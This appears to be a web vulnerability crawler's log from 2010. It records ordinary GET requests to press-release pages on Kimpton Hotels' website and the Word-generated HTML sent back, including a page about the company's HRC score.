User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Host: www.kimptonhotels.com
Cookie: ASP.NET_SessionId=hyd2ui55rxmm2q55xslvrq55; ASPSESSIONIDAQQBQDDR=JDFEFPHBNDJFCIHIDDMHMENO
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 02:11:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 39412
Content-Type: text/html
Cache-control: private


<html xmlns:v="urn:schemas-microsoft-com:vml"xmlns:o="urn:schemas-microsoft-com:office:office"xmlns:w="urn:schemas-microsoft-com:office:word"xmlns:m="http://schemas.microsoft.com/office/2004/12/omml"xmlns:css="http://macVmlSchemaUri" xmlns="http://www.w3.org/TR/REC-html40"><head><meta name=Titlecontent="Kimpton Hotels &amp; Restaurants Earns 100% HRC Score For Third Consecutive Year"><meta name=Keywords content=""><meta http-equiv=Content-Type content="text/html; charset=macintosh"><meta name=ProgId content=Word.Document><meta name=Generator content="Microsoft Word 2008"><meta name=Originator content="Microsoft Word 2008"><link rel=File-List href="images/filelist.xml"><link rel=Edit-Time-Data href="images/editdata.mso"><link rel=OLE-Object-Data href="images/oledata.mso"><!--[if !mso]><style>v\:* {behavior:url(#default#VML);}o\:* {behavior:url(#default#VML);}w\:* {behavior:url(#default#VML);}.shape {behavior:url(#default#VML);}</style><![endif]--><title>Kimpton Hotels &amp; Restaurants Earns 100% HRC Score For ThirdConsecutive Year</title><!--[if gte mso 9]><xml> <o:DocumentProperties> <o:Author>Trial User</o:Author> <o:Template>Normal.dotm</o:Template> <o:LastAuthor>Marie Chen</o:LastAuthor> <o:Revision>2</o:Revision> <o:TotalTime>4</o:TotalTime> <o:LastPrinted>2009-04-07T22:06:00Z</o:LastPrinted> <o:Created>2009-07-17T20:10:00Z</o:Created> <o:LastSaved>2009-07-17T20:10:00Z</o:LastSaved> <o:Pages>1</o:Pages> <o:Words>719</o:Words> <o:Characters>4099</o:Characters> <o:Company>CMI</o:Company> <o:Lines>34</o:Lines> <o:Paragraphs>8</o:Paragraphs> <o:CharactersWithSpaces>5033</o:CharactersWithSpaces> <o:Version>12.0</o:Version> </o:DocumentProperties> <o:OfficeDocumentSettings> <o:PixelsPerInch>96</o:PixelsPerInch> <o:TargetScreenSize>800x600</o:TargetScreenSize> </o:OfficeDocumentSettings></xml><![endif]--><!--[if gte mso 9]><xml> <w:WordDocument> <w:TrackMoves>false</w:TrackMoves> <w:TrackFormatting/> <w:DisplayHorizontalDrawingGridEvery>0</w:DisplayHorizontalDrawingGridEvery> <w:DisplayVerticalDrawingGridEvery>0</w:DisplayVerticalDrawingGridEvery> <w:UseMarginsForDrawingGridOrigin/> <w:ValidateAgainstSchemas/> <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid> <w:IgnoreMixedContent>false</w:IgnoreMixedContent> <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText> <w:Compatibility> <w:SpaceForUL/> <w:BalanceSingleByteDoubleByteWidth/> <w:DoNotLeaveBackslashAlone/> <w:ULTrailSpace/> <w:DoNotExpandShiftReturn/> <w:AdjustLineHeightInTable/> <w:UseNormalStyleForList/> <w:DontUseIndentAsNumberingTabStop/> <w:FELineBreak11/> <w:WW11IndentRules/> <w:DontAutofitConstrainedTables/> <w:AutofitLikeWW11/> <w:HangulWidthLikeWW11/> </w:Compatibility> </w:WordDocument></xml><![endif]--><!--[if gte mso 9]><xml> <w:LatentStyles DefLockedState="false" LatentStyleCount="276"> </w:LatentStyles></xml><![endif]--><style><!-- /* Font Definitions */@font-face {font-family:Arial; panose-1:2 11 6 4 2 2 2 2 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:"Courier New"; panose-1:2 7 3 9 2 2 5 2 4 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Times; panose-1:2 0 5 0 0 0 0 0 0 0; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Wingdings; panose-1:5 2 1 2 1 8 4 8 7 8; mso-font-charset:2; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:0 0 65536 0 128 0;}@font-face {font-family:Calibri; panose-1:2 15 5 2 2 2 4 3 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Tahoma; panose-1:2 11 6 4 3 5 4 4 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:"Arial Unicode MS"; mso-font-alt:"\30D2\30E9\30AE\30CE\89D2\30B4 Pro W3"; mso-font-charset:128; mso-generic-font-family:swiss; mso-font-pitch:variable; mso-font-signature:-1 -23 1056964608 0 -16695552 0;}@font-face {font-family:Consolas; panose-1:2 11 6 9 2 2 4 3 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Batang; panose-1:0 0 0 0 0 0 0 0 0 0; mso-font-alt:\BC14\D0D5; mso-font-charset:129; mso-generic-font-family:auto; mso-font-format:other; mso-font-pitch:fixed; mso-font-signature:16777216 1545 268435456 0 2048 0;} /* Style Definitions */p.MsoNormal, li.MsoNormal, div.MsoNormal {mso-style-parent:""; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:12.0pt; mso-bidi-font-size:10.0pt; font-family:"Times New Roman"; mso-ascii-font-family:Times; mso-fareast-font-family:Times; mso-hansi-font-family:Times; mso-bidi-font-family:"Times New Roman";}h1 {mso-margin-top-alt:auto; margin-right:0in; mso-margin-bottom-alt:auto; margin-left:0in; mso-pagination:widow-orphan; mso-outline-level:1; font-size:24.0pt; mso-bidi-font-size:10.0pt; font-family:"Times New Roman"; mso-ascii-font-family:"Arial Unicode MS"; mso-fareast-font-family:"Arial Unicode MS"; mso-hansi-font-family:"Arial Unicode MS";}p.MsoCommentText, li.MsoCommentText, div.MsoCommentText {mso-style-noshow:yes; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.0pt; font-family:"Times New Roman"; mso-fareast-font-family:"Times New Roman"; mso-bidi-font-family:"Times New Roman";}p.MsoHeader, li.MsoHeader, div.MsoHeader {margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; tab-stops:center 3.0in right 6.0in; font-size:12.0pt; mso-bidi-font-size:10.0pt; font-family:"Times New Roman"; mso-ascii-font-family:Times; mso-fareast-font-family:Times; mso-hansi-font-family:Times; mso-bidi-font-family:"Times New Roman";}p.MsoFooter, li.MsoFooter, div.MsoFooter {margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; tab-stops:center 3.0in right 6.0in; font-size:12.0pt; mso-bidi-font-size:10.0pt; font-family:"Times New Roman"; mso-ascii-font-family:Times; mso-fareast-font-family:Times; mso-hansi-font-family:Times; mso-bidi-font-family:"Times New Roman";}span.MsoCommentReference {mso-style-noshow:yes; mso-ansi-font-size:8.0pt; mso-bidi-font-size:8.0pt;}p.MsoBodyText, li.MsoBodyText, div.MsoBodyText {margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:11.0pt; font-family:Arial; mso-fareast-font-family:Times; mso-bidi-font-family:Arial; color:black;}a:link, span.MsoHyperlink {color:blue; text-decoration:underline; text-underline:single;}a:visited, span.MsoHyperlinkFollowed {color:purple; text-decoration:underline; text-underline:single;}strong {mso-bidi-font-weight:bold;}p.MsoPlainText, li.MsoPlainText, div.MsoPlainText {mso-style-link:"Plain Text Char"; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.5pt; font-family:"Times New Roman"; mso-ascii-font-family:Consolas; mso-fareast-font-family:Calibri; mso-hansi-font-family:Consolas; mso-bidi-font-family:"Times New Roman";}p.MsoCommentSubject, li.MsoCommentSubject, div.MsoCommentSubject {mso-style-noshow:yes; mso-style-parent:"Comment Text"; mso-style-next:"Comment Text"; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.0pt; font-family:"Times New Roman"; mso-ascii-font-family:Times; mso-fareast-font-family:Times; mso-hansi-font-family:Times; mso-bidi-font-family:"Times New Roman"; font-weight:bold;}p.MsoAcetate, li.MsoAcetate, div.MsoAcetate {mso-style-noshow:yes; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:8.0pt; font-family:Tahoma; mso-fareast-font-family:Times; mso-bidi-font-family:Tahoma;}p.MsoListParagraph, li.MsoListParagraph, div.MsoListParagraph {margin-top:0in; margin-right:0in; margin-bottom:0in; margin-left:.5in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:11.0pt; font-family:"Times New Roman"; mso-ascii-font-family:Calibri; mso-fareast-font-family:Calibri; mso-hansi-font-family:Calibri; mso-bidi-font-family:"Times New Roman";}span.PlainTextChar {mso-style-name:"Plain Text Char"; mso-style-locked:yes; mso-style-link:"Plain Text"; mso-ansi-font-size:10.5pt; mso-bidi-font-size:10.5pt; font-family:Consolas; mso-ascii-font-family:Consolas; mso-fareast-font-family:Calibri; mso-hansi-font-family:Consolas;}span.emailstyle17 {mso-style-name:emailstyle17; mso-style-noshow:yes; mso-ansi-font-size:10.0pt; mso-bidi-font-size:10.0pt; font-family:Arial; mso-ascii-font-family:Arial; mso-hansi-font-family:Arial; mso-bidi-font-family:Arial; color:windowtext;} /* Page Definitions */@page {mso-footnote-separator:url(":images:header.htm") fs; mso-footnote-continuation-separator:url(":images:header.htm") fcs; mso-endnote-separator:url(":images:header.htm") es; mso-endnote-continuation-separator:url(":images:header.htm") ecs;}@page Section1 {size:8.5in 11.0in; margin:1.0in 1.0in 1.0in 1.0in; mso-header-margin:.5in; mso-footer-margin:.5in; mso-paper-source:0;}div.Section1 {page:Section1;} /* List Definitions */@list l0 {mso-list-id:-1802115189; mso-list-type:hybrid; mso-list-template-ids:201068776 -1 -1 -1 -1 -1 -1 -1 -1 -1;}@list l0:level1 {mso-level-suffix:none; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level2 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level3 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level4 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level5 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level6 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level7 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level8 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level9 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l1 {mso-list-id:64647809; mso-list-type:hybrid; mso-list-template-ids:139243376 721929 197641 328713 66569 197641 328713 66569 197641 328713;}@list l1:level1 {mso-level-number-format:bullet; mso-level-text:\F0D8; mso-level-tab-stop:.25in; mso-level-number-position:left; margin-left:.25in; text-indent:-.25in; font-family:Wingdings;}@list l1:level2 {mso-level-tab-stop:1.0in; mso-level-number-position:left; text-indent:-.25in;}@list l1:level3 {mso-level-tab-stop:1.5in; mso-level-number-position:left; text-indent:-.25in;}@list l1:level4 {mso-level-tab-stop:2.0in; mso-level-number-position:left; text-indent:-.25in;}@list l1:level5 {mso-level-tab-stop:2.5in; mso-level-number-position:left; text-indent:-.25in;}@list l1:level6 {mso-level-tab-stop:3.0in; mso-level-number-position:left; text-indent:-.25in;}@list l1:level7 {mso-level-tab-stop:3.5in; mso-level-number-position:left; text-indent:-.25in;}@list l1:level8 {mso-level-tab-stop:4.0in; mso-level-number-position:left; text-indent:-.25in;}@list l1:level9 {mso-level-tab-stop:4.5in; mso-level-number-position:left; text-indent:-.25in;}@list l2 {mso-list-id:843860152; mso-list-type:hybrid; mso-list-template-ids:-1039644228 721929 -1628119522 328713 66569 197641 328713 66569 197641 328713;}@list l2:level1 {mso-level-number-format:bullet; mso-level-text:\F0D8; mso-level-tab-stop:.25in; mso-level-number-position:left; margin-left:.25in; text-indent:-.25in; font-family:Wingdings;}@list l2:level2 {mso-level-start-at:0; mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.75in; mso-level-number-position:left; margin-left:.75in; text-indent:-.25in; font-family:Symbol; mso-fareast-font-family:Batang;}@list l2:level3 {mso-level-tab-stop:1.5in; mso-level-number-position:left; text-indent:-.25in;}@list l2:level4 {mso-level-tab-stop:2.0in; mso-level-number-position:left; text-indent:-.25in;}@list l2:level5 {mso-level-tab-stop:2.5in; mso-level-number-position:left; text-indent:-.25in;}@list l2:level6 {mso-level-tab-stop:3.0in; mso-level-number-position:left; text-indent:-.25in;}@list l2:level7 {mso-level-tab-stop:3.5in; mso-level-number-position:left; text-indent:-.25in;}@list l2:level8 {mso-level-tab-stop:4.0in; mso-level-number-position:left; text-indent:-.25in;}@list l2:level9 {mso-level-tab-stop:4.5in; mso-level-number-position:left; text-indent:-.25in;}@list l3 {mso-list-id:1399667351; mso-list-type:hybrid; mso-list-template-ids:538869484 984073 1639433 1770505 984073 1639433 1770505 984073 1639433 1770505;}@list l3:level1 {mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in;}@list l4 {mso-list-id:1845976926; mso-list-type:hybrid; mso-list-template-ids:-782627200 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l4:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:none; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol;}@list l4:level2 {mso-level-tab-stop:1.0in; mso-level-number-position:left; text-indent:-.25in;}@list l4:level3 {mso-level-tab-stop:1.5in; mso-level-number-position:left; text-indent:-.25in;}@list l4:level4 {mso-level-tab-stop:2.0in; mso-level-number-position:left; text-indent:-.25in;}@list l4:level5 {mso-level-tab-stop:2.5in; mso-level-number-position:left; text-indent:-.25in;}@list l4:level6 {mso-level-tab-stop:3.0in; mso-level-number-position:left; text-indent:-.25in;}@list l4:level7 {mso-level-tab-stop:3.5in; mso-level-number-position:left; text-indent:-.25in;}@list l4:level8 {mso-level-tab-stop:4.0in; mso-level-number-position:left; text-indent:-.25in;}@list l4:level9 {mso-level-tab-stop:4.5in; mso-level-number-position:left; text-indent:-.25in;}@list l5 {mso-list-id:1941453358; mso-list-type:hybrid; mso-list-template-ids:-1688807260 -1628119522 197641 328713 66569 197641 328713 66569 197641 328713;}@list l5:level1 {mso-level-start-at:0; mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.75in; mso-level-number-position:left; margin-left:.75in; text-indent:-.25in; font-family:Symbol; mso-fareast-font-family:Batang;}@list l5:level2 {mso-level-number-format:bullet; mso-level-text:o; mso-level-tab-stop:1.5in; mso-level-number-position:left; margin-left:1.5in; text-indent:-.25in; font-family:"Courier New"; mso-bidi-font-family:"Courier New";}@list l5:level3 {mso-level-tab-stop:1.5in; mso-level-number-position:left; text-indent:-.25in;}@list l5:level4 {mso-level-tab-stop:2.0in; mso-level-number-position:left; text-indent:-.25in;}@list l5:level5 {mso-level-tab-stop:2.5in; mso-level-number-position:left; text-indent:-.25in;}@list l5:level6 {mso-level-tab-stop:3.0in; mso-level-number-position:left; text-indent:-.25in;}@list l5:level7 {mso-level-tab-stop:3.5in; mso-level-number-position:left; text-indent:-.25in;}@list l5:level8 {mso-level-tab-stop:4.0in; mso-level-number-position:left; text-indent:-.25in;}@list l5:level9 {mso-level-tab-stop:4.5in; mso-level-number-position:left; text-indent:-.25in;}@list l6 {mso-list-id:1989821850; mso-list-type:hybrid; mso-list-template-ids:-1377918716 984073 1639433 1770505 984073 1639433 1770505 984073 1639433 1770505;}@list l6:level1 {mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in;}@list l7 {mso-list-id:2066563486; mso-list-template-ids:-24617030;}@list l7:level1 {mso-level-number-format:bullet; mso-level-text:\F0A7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; mso-ansi-font-size:10.0pt; font-family:Wingdings;}@list l8 {mso-list-id:2077580739; mso-list-type:hybrid; mso-list-template-ids:-1378210954 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l8:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol;}ol {margin-bottom:0in;}ul {margin-bottom:0in;}--></style><!--[if gte mso 10]><style> /* Style Definitions */table.MsoNormalTable {mso-style-name:"Table Normal"; mso-tstyle-rowband-size:0; mso-tstyle-colband-size:0; mso-style-noshow:yes; mso-style-parent:""; mso-padding-alt:0in 5.4pt 0in 5.4pt; mso-para-margin:0in; mso-para-margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.0pt; font-family:"Times New Roman"; mso-ascii-font-family:Times; mso-hansi-font-family:Times;}</style><![endif]--><!--[if gte mso 9]><xml> <o:shapedefaults v:ext="edit" spidmax="2050"/></xml><![endif]--><!--[if gte mso 9]><xml> <o:shapelayout v:ext="edit"> <o:idmap v:ext="edit" data="1"/> </o:shapelayout></xml><![endif]--></head><body lang=EN-US link=blue vlink=purple style='tab-interval:.5in'><div class=Section1><p class=MsoNormal><a name="OLE_LINK1"></a><a name="OLE_LINK2"><spanstyle='mso-bookmark:OLE_LINK1'><span style='font-size:11.0pt;font-family:Arial;mso-bidi-font-family:Arial'><!--[if gte vml 1]><v:shapetype id="_x0000_t75" coordsize="21600,21600" o:spt="75" o:preferrelative="t" path="m@4@5l@4@11@9@11@9@5xe" filled="f" stroked="f"> <v:stroke joinstyle="miter"/> <v:formulas> <v:f eqn="if lineDrawn pixelLineWidth 0"/> <v:f eqn="sum @0 1 0"/> <v:f eqn="sum 0 0 @1"/> <v:f eqn="prod @2 1 2"/> <v:f eqn="prod @3 21600 pixelWidth"/> <v:f eqn="prod @3 21600 pixelHeight"/> <v:f eqn="sum @0 0 1"/> <v:f eqn="prod @6 1 2"/> <v:f eqn="prod @7 21600 pixelWidth"/> <v:f eqn="sum @8 21600 0"/> <v:f eqn="prod @7 21600 pixelHeight"/> <v:f eqn=&quo..
- /pdfs/press/html/Green-Meetings-0409/index.html

/pdfs/press/html/Green-Meetings-0409/index.html

http://www.kimptonhotels.com/pdfs/press/html/Green-Meetings-0409/index.html

Request

GET /pdfs/press/html/Green-Meetings-0409/index.html HTTP/1.1
Referer: http://www.kimptonhotels.com/about-us/press-releases.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Host: www.kimptonhotels.com
Cookie: ASP.NET_SessionId=hyd2ui55rxmm2q55xslvrq55; ASPSESSIONIDAQQBQDDR=JDFEFPHBNDJFCIHIDDMHMENO
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 02:11:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 39412
Content-Type: text/html
Cache-control: private


<html xmlns:v="urn:schemas-microsoft-com:vml"xmlns:o="urn:schemas-microsoft-com:office:office"xmlns:w="urn:schemas-microsoft-com:office:word"xmlns:m="http://schemas.microsoft.com/office/2004/12/omml"xmlns:css="http://macVmlSchemaUri" xmlns="http://www.w3.org/TR/REC-html40"><head><meta name=Titlecontent="Kimpton Hotels &amp; Restaurants Earns 100% HRC Score For Third Consecutive Year"><meta name=Keywords content=""><meta http-equiv=Content-Type content="text/html; charset=macintosh"><meta name=ProgId content=Word.Document><meta name=Generator content="Microsoft Word 2008"><meta name=Originator content="Microsoft Word 2008"><link rel=File-List href="images/filelist.xml"><link rel=Edit-Time-Data href="images/editdata.mso"><link rel=OLE-Object-Data href="images/oledata.mso"><!--[if !mso]><style>v\:* {behavior:url(#default#VML);}o\:* {behavior:url(#default#VML);}w\:* {behavior:url(#default#VML);}.shape {behavior:url(#default#VML);}</style><![endif]--><title>Kimpton Hotels &amp; Restaurants Earns 100% HRC Score For ThirdConsecutive Year</title><!--[if gte mso 9]><xml> <o:DocumentProperties> <o:Author>Trial User</o:Author> <o:Template>Normal.dotm</o:Template> <o:LastAuthor>Marie Chen</o:LastAuthor> <o:Revision>2</o:Revision> <o:TotalTime>4</o:TotalTime> <o:LastPrinted>2009-04-07T22:06:00Z</o:LastPrinted> <o:Created>2009-07-17T20:10:00Z</o:Created> <o:LastSaved>2009-07-17T20:10:00Z</o:LastSaved> <o:Pages>1</o:Pages> <o:Words>719</o:Words> <o:Characters>4099</o:Characters> <o:Company>CMI</o:Company> <o:Lines>34</o:Lines> <o:Paragraphs>8</o:Paragraphs> <o:CharactersWithSpaces>5033</o:CharactersWithSpaces> <o:Version>12.0</o:Version> </o:DocumentProperties> <o:OfficeDocumentSettings> <o:PixelsPerInch>96</o:PixelsPerInch> <o:TargetScreenSize>800x600</o:TargetScreenSize> </o:OfficeDocumentSettings></xml><![endif]--><!--[if gte mso 9]><xml> <w:WordDocument> <w:TrackMoves>false</w:TrackMoves> <w:TrackFormatting/> <w:DisplayHorizontalDrawingGridEvery>0</w:DisplayHorizontalDrawingGridEvery> <w:DisplayVerticalDrawingGridEvery>0</w:DisplayVerticalDrawingGridEvery> <w:UseMarginsForDrawingGridOrigin/> <w:ValidateAgainstSchemas/> <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid> <w:IgnoreMixedContent>false</w:IgnoreMixedContent> <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText> <w:Compatibility> <w:SpaceForUL/> <w:BalanceSingleByteDoubleByteWidth/> <w:DoNotLeaveBackslashAlone/> <w:ULTrailSpace/> <w:DoNotExpandShiftReturn/> <w:AdjustLineHeightInTable/> <w:UseNormalStyleForList/> <w:DontUseIndentAsNumberingTabStop/> <w:FELineBreak11/> <w:WW11IndentRules/> <w:DontAutofitConstrainedTables/> <w:AutofitLikeWW11/> <w:HangulWidthLikeWW11/> </w:Compatibility> </w:WordDocument></xml><![endif]--><!--[if gte mso 9]><xml> <w:LatentStyles DefLockedState="false" LatentStyleCount="276"> </w:LatentStyles></xml><![endif]--><style><!-- /* Font Definitions */@font-face {font-family:Arial; panose-1:2 11 6 4 2 2 2 2 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:"Courier New"; panose-1:2 7 3 9 2 2 5 2 4 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Times; panose-1:2 0 5 0 0 0 0 0 0 0; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Wingdings; panose-1:5 2 1 2 1 8 4 8 7 8; mso-font-charset:2; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:0 0 65536 0 128 0;}@font-face {font-family:Calibri; panose-1:2 15 5 2 2 2 4 3 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Tahoma; panose-1:2 11 6 4 3 5 4 4 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:"Arial Unicode MS"; mso-font-alt:"\30D2\30E9\30AE\30CE\89D2\30B4 Pro W3"; mso-font-charset:128; mso-generic-font-family:swiss; mso-font-pitch:variable; mso-font-signature:-1 -23 1056964608 0 -16695552 0;}@font-face {font-family:Consolas; panose-1:2 11 6 9 2 2 4 3 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Batang; panose-1:0 0 0 0 0 0 0 0 0 0; mso-font-alt:\BC14\D0D5; mso-font-charset:129; mso-generic-font-family:auto; mso-font-format:other; mso-font-pitch:fixed; mso-font-signature:16777216 1545 268435456 0 2048 0;} /* Style Definitions */p.MsoNormal, li.MsoNormal, div.MsoNormal {mso-style-parent:""; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:12.0pt; mso-bidi-font-size:10.0pt; font-family:"Times New Roman"; mso-ascii-font-family:Times; mso-fareast-font-family:Times; mso-hansi-font-family:Times; mso-bidi-font-family:"Times New Roman";}h1 {mso-margin-top-alt:auto; margin-right:0in; mso-margin-bottom-alt:auto; margin-left:0in; mso-pagination:widow-orphan; mso-outline-level:1; font-size:24.0pt; mso-bidi-font-size:10.0pt; font-family:"Times New Roman"; mso-ascii-font-family:"Arial Unicode MS"; mso-fareast-font-family:"Arial Unicode MS"; mso-hansi-font-family:"Arial Unicode MS";}p.MsoCommentText, li.MsoCommentText, div.MsoCommentText {mso-style-noshow:yes; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.0pt; font-family:"Times New Roman"; mso-fareast-font-family:"Times New Roman"; mso-bidi-font-family:"Times New Roman";}p.MsoHeader, li.MsoHeader, div.MsoHeader {margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; tab-stops:center 3.0in right 6.0in; font-size:12.0pt; mso-bidi-font-size:10.0pt; font-family:"Times New Roman"; mso-ascii-font-family:Times; mso-fareast-font-family:Times; mso-hansi-font-family:Times; mso-bidi-font-family:"Times New Roman";}p.MsoFooter, li.MsoFooter, div.MsoFooter {margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; tab-stops:center 3.0in right 6.0in; font-size:12.0pt; mso-bidi-font-size:10.0pt; font-family:"Times New Roman"; mso-ascii-font-family:Times; mso-fareast-font-family:Times; mso-hansi-font-family:Times; mso-bidi-font-family:"Times New Roman";}span.MsoCommentReference {mso-style-noshow:yes; mso-ansi-font-size:8.0pt; mso-bidi-font-size:8.0pt;}p.MsoBodyText, li.MsoBodyText, div.MsoBodyText {margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:11.0pt; font-family:Arial; mso-fareast-font-family:Times; mso-bidi-font-family:Arial; color:black;}a:link, span.MsoHyperlink {color:blue; text-decoration:underline; text-underline:single;}a:visited, span.MsoHyperlinkFollowed {color:purple; text-decoration:underline; text-underline:single;}strong {mso-bidi-font-weight:bold;}p.MsoPlainText, li.MsoPlainText, div.MsoPlainText {mso-style-link:"Plain Text Char"; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.5pt; font-family:"Times New Roman"; mso-ascii-font-family:Consolas; mso-fareast-font-family:Calibri; mso-hansi-font-family:Consolas; mso-bidi-font-family:"Times New Roman";}p.MsoCommentSubject, li.MsoCommentSubject, div.MsoCommentSubject {mso-style-noshow:yes; mso-style-parent:"Comment Text"; mso-style-next:"Comment Text"; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.0pt; font-family:"Times New Roman"; mso-ascii-font-family:Times; mso-fareast-font-family:Times; mso-hansi-font-family:Times; mso-bidi-font-family:"Times New Roman"; font-weight:bold;}p.MsoAcetate, li.MsoAcetate, div.MsoAcetate {mso-style-noshow:yes; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:8.0pt; font-family:Tahoma; mso-fareast-font-family:Times; mso-bidi-font-family:Tahoma;}p.MsoListParagraph, li.MsoListParagraph, div.MsoListParagraph {margin-top:0in; margin-right:0in; margin-bottom:0in; margin-left:.5in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:11.0pt; font-family:"Times New Roman"; mso-ascii-font-family:Calibri; mso-fareast-font-family:Calibri; mso-hansi-font-family:Calibri; mso-bidi-font-family:"Times New Roman";}span.PlainTextChar {mso-style-name:"Plain Text Char"; mso-style-locked:yes; mso-style-link:"Plain Text"; mso-ansi-font-size:10.5pt; mso-bidi-font-size:10.5pt; font-family:Consolas; mso-ascii-font-family:Consolas; mso-fareast-font-family:Calibri; mso-hansi-font-family:Consolas;}span.emailstyle17 {mso-style-name:emailstyle17; mso-style-noshow:yes; mso-ansi-font-size:10.0pt; mso-bidi-font-size:10.0pt; font-family:Arial; mso-ascii-font-family:Arial; mso-hansi-font-family:Arial; mso-bidi-font-family:Arial; color:windowtext;} /* Page Definitions */@page {mso-footnote-separator:url(":images:header.htm") fs; mso-footnote-continuation-separator:url(":images:header.htm") fcs; mso-endnote-separator:url(":images:header.htm") es; mso-endnote-continuation-separator:url(":images:header.htm") ecs;}@page Section1 {size:8.5in 11.0in; margin:1.0in 1.0in 1.0in 1.0in; mso-header-margin:.5in; mso-footer-margin:.5in; mso-paper-source:0;}div.Section1 {page:Section1;} /* List Definitions */@list l0 {mso-list-id:-1802115189; mso-list-type:hybrid; mso-list-template-ids:201068776 -1 -1 -1 -1 -1 -1 -1 -1 -1;}@list l0:level1 {mso-level-suffix:none; mso-level-text:""; mso-level-tab-stop:none; 